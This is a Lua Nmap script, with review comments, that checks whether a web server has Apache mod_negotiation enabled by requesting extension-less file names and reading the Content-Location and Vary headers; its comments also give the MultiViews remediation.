local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
-- Script help text. NSE reads the global `description` and shows it in
-- `nmap --script-help` output, so the string below is runtime data.
-- NOTE(review): the text says "mod_negotiate" once; the Apache module it
-- refers to is mod_negotiation.
description = [[
Checks if the target http server has mod_negotiation enabled. This
feature can be leveraged to find hidden resources and spider a web
site using fewer requests.
The script works by sending requests for resources like index and home
without specifying the extension. If mod_negotiate is enabled (default
Apache configuration), the target would reply with content-location header
containing target resource (such as index.html) and vary header containing
"negotiate" depending on the configuration.
For more information, see:
* http://www.wisec.it/sectou.php?id=4698ebdc59d15
* Metasploit auxiliary module
/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb
]]
---
-- @usage
-- nmap --script=http-apache-negotiation --script-args http-apache-negotiation.root=/root/ <target>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- |_http-apache-negotiation: mod_negotiation enabled.
--
-- @args http-apache-negotiation.root Path of the target web site root.
-- Probe names are appended to it directly, so it should end with a slash.
-- Defaults to <code>/</code>.
-- NSE script metadata, read by Nmap from these globals.
author = "Hani Benhabiles"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
-- "safe" and "discovery": the script is selected by those category names.
categories = {"safe", "discovery"}
-- Run only against ports that shortport.http accepts as HTTP services.
portrule = shortport.http
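--- Probe a few extension-less resource names and report whether the replies
-- show Apache content negotiation (mod_negotiation) at work.
--
-- For each name the script requests <root><name> and inspects two response
-- headers: Content-Location (the negotiated file, e.g. "index.html") and
-- Vary (which names "negotiate" when negotiation shaped the reply).
--
-- A positive result means extension-less requests disclose real file names on
-- this server; on Apache that behaviour comes from MultiViews and goes away
-- with `Options -MultiViews` where it is not needed.
--
-- @param host NSE host table, passed through to http.get.
-- @param port NSE port table, passed through to http.get.
-- @return "mod_negotiation enabled." on the first matching reply, otherwise
--         nothing, so no output line is produced for the port.
action = function(host, port)
  -- The probe name is appended as-is, so a custom root should end in "/".
  local root = stdnse.get_script_args("http-apache-negotiation.root") or "/"

  -- Common default file names. Could add a couple more.
  local files = { 'robots', 'index', 'home', 'blog' }

  for _, file in ipairs(files) do
    local response = http.get(host, port, root .. file)
    -- Tolerate a failed request that comes back without a header table.
    local header = response and response.header or {}
    local location = header["content-location"]
    local vary = header["vary"]

    -- Plain-text search (4th argument true): as a Lua pattern the "." would
    -- match any character, so "index." also matched names such as "indexes"
    -- and reported negotiation where none was shown.
    -- Vary lists header field names, which are case-insensitive, hence lower().
    if location and string.find(location, file .. ".", 1, true)
      or vary and string.find(string.lower(vary), "negotiate", 1, true) then
      return "mod_negotiation enabled."
    end
  end
end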